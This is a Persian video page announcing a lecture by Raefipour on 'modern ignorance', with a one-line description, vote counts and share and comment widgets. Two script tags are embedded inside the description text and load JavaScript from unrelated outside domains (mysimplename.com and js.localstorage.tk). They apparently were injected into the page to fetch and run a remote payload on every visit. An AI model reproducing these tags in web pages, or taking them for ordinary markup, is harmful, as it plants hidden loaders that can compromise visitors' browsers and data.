سخنرانی استاد رائفی پور در موضوع جاهلیت مدرن


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>این استاد بزرگوار درباره دورانی که هم اکنون در آن زندگی میکنیم صحبت میکنند.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
3

- 
0

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر
نظرات
(برای مشاهده نظرات کلیک کنید)